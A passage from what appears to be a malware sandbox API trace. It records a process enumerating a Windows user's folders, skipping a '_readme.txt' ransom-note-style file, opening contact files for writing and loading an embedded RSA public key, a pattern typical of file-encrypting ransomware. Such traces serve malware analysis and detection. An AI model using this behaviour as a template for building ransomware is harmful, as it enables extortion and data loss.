nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0228.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0228.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0228.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0228.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c319580, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c33f6e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0228.095] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0228.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c319580, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c33f6e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0228.095] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.095] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.095] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.096] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0228.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.096] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.096] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.096] PathFindFileNameW (pszPath="") returned="" [0228.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x202aaf60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x202aaf60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0228.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0228.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0228.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0228.096] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.097] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.097] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0228.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.097] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.097] PathFindFileNameW (pszPath="") returned="" [0228.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0228.097] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.097] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0228.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.098] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.098] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.098] PathFindFileNameW (pszPath="") returned="" [0228.098] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0228.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0228.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0228.099] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=1178) returned 1 [0228.099] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0228.102] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.102] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0228.104] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x49a, lpOverlapped=0x0) returned 1 [0228.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0228.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0228.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0228.104] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0228.105] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0228.105] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0228.106] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0228.106] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0aa8, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0aa8, pdwDataLen=0x3adfa54) returned 1 [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.106] SetLastError (dwErrCode=0x0) [0228.106] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] GetLastError () returned 0x0 [0228.107] SetLastError (dwErrCode=0x0) [0228.107] CryptDestroyHash (hHash=0x31de170) returned 1 [0228.107] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0228.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0228.108] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0228.109] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0228.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0228.109] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0228.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0228.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0228.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x325d6d0 [0228.110] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0228.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0228.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325db78 [0228.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0228.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0228.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0228.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7119d0 [0228.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0228.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edb30 [0228.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0d48 [0228.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edb48 [0228.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edb60 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edb78 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0aa8 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edb90 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edba8 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbc0 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbd8 [0228.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0228.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc08 [0228.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc20 [0228.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0228.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0228.177] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325ed90 [0228.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325efb0 [0228.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0228.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0228.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc08 | out: hHeap=0x630000) returned 1 [0228.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0228.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325efb0 | out: hHeap=0x630000) returned 1 [0228.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc08 [0228.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0228.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edc20 [0228.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0a68 [0228.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edbf0 [0228.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0228.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0228.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0228.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0228.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0228.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31a4298 [0228.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0228.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0228.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0a68 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0228.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc08 | out: hHeap=0x630000) returned 1 [0228.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed878 | out: hHeap=0x630000) returned 1 [0228.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0228.267] HeapFree (in: 